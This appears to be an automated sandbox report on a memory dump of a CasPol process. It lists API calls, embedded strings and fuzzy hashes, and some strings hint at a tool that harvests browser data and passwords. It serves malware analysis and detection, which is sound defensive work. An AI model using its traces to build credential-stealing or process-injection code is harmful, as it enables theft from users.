                                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1043902810-0
                                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID: ---
                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1010922700-0
                                                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2012295524-70141382
                                                                                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1700100422-0
                                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 552707033-0
                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                  • String ID: 4$h
                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                  • String ID: %%0.%df
                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                  • String ID: A
                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
